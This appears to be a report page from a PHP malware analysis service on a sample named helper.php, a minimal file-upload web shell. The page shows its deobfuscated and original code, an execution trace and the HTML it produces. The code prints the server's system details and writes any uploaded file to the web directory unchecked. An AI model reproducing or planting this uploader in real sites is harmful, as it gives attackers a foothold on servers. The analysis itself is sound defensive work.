helper.php

md5: 3320904323efd271130400ea7065dec0

Jump to:

Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)

Screenshot
Attributes
Environment
php_uname (Deobfuscated, Original, Traces)

Files
copy (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_POST (Deobfuscated, Original)

Deobfuscated PHP code
n4sss
<?php 
echo '<b><br><br><br><br><br><br><center><font color:"blue"><span style="font-family: monospace;"><span style="color: rgb(255, 255, 255);"><br><br><font color="black">' . php_uname() . '</font><br></b>';
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>";
if ($_POST['_upl'] == "Upload") {
    if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo "<b>Arquivo upado !!!</b><br><br>";
    } else {
        echo "<b>Upload Fail !!!</b><br><br></font>";
    }
}
Execution traces
data/traces/3320904323efd271130400ea7065dec0_trace-1676242586.5144.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:56:52.412263]
1	0	1	0.000136	393528
1	3	0	0.000194	396368	{main}	1		/var/www/html/uploads/helper.php	0	0
2	4	0	0.000211	396368	php_uname	0		/var/www/html/uploads/helper.php	2	0
2	4	1	0.000226	396480
2	4	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1	3	1	0.000263	396368
			0.000288	314240
TRACE END   [2023-02-12 20:56:52.412442]

Generated HTML code
<html><head></head><body>n4sss
<b><br><br><br><br><br><br></b><center><b><font color:"blue"=""><span style="font-family: monospace;"><span style="color: rgb(255, 255, 255);"><br><br><font color="black">Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</font><br></span></span></font></b><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><font color:"blue"=""><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></font></form></center></body></html>
Original PHP code
n4sss
<?php echo '<b><br><br><br><br><br><br><center><font color:"blue"><span style="font-family: monospace;"><span style="color: rgb(255, 255, 255);"><br><br><font color="black">'.php_uname().'</font><br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Arquivo upado !!!</b><br><br>'; } else { echo '<b>Upload Fail !!!</b><br><br></font>'; } } ?>

PHP Malware Analysis

helper.php

md5: 3320904323efd271130400ea7065dec0

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code